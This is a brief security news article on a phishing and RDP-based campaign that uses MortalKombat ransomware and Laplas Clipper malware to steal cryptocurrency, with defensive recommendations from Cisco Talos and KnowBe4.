A recent financial fraud scheme has been identified, utilizing a modified version of the Xorist ransomware known as “MortalKombat” in conjunction with the Laplas Clipper malware. This cyber-attack campaign has primarily targeted victims in the United States, along with individuals in the United Kingdom, Turkey, and the Philippines.
According to a recent advisory from Cisco Talos, the threat actors behind this campaign are focused on stealing cryptocurrency from their victims. The utilization of cryptocurrency provides these attackers with benefits such as anonymity, decentralization, and a lack of regulation, making it a more challenging task to trace their activities.
The modus operandi of the attackers involves scanning the internet for vulnerable machines with exposed remote desktop protocol (RDP) ports. Subsequently, they deploy their ransomware through a download server, targeting these vulnerable systems.
The attack typically begins with a phishing email that sets off a multi-stage chain of events, resulting in the delivery of malware or ransomware to the victim’s device. The malicious ZIP file attached to the phishing email contains a BAT loader script that, when executed, downloads another malicious ZIP file from the attacker’s server, extracts it, and runs the payload – either the Laplas Clipper malware or the MortalKombat ransomware.
After executing the payload, the loader script deletes any traces of the malicious files to cover their tracks. To combat such attacks, Cisco Talos recommends that companies exercise caution when engaging in cryptocurrency transactions and focus on strengthening email phishing defenses.
Erich Kron, a security awareness advocate at KnowBe4, emphasizes the importance of restricting the use of .ZIP files in emails to mitigate the risk of malware spread. By disallowing these types of archive files, organizations can enhance their defense mechanisms against phishing campaigns like the one described in the advisory.
Phishing attacks continue to be a prevalent threat, as highlighted in a recent report by Cofense, which noted an 800% increase in the use of Telegram bots as destinations for stolen information between 2021 and 2022. This underscores the importance of implementing robust cybersecurity measures to safeguard against evolving cyber threats.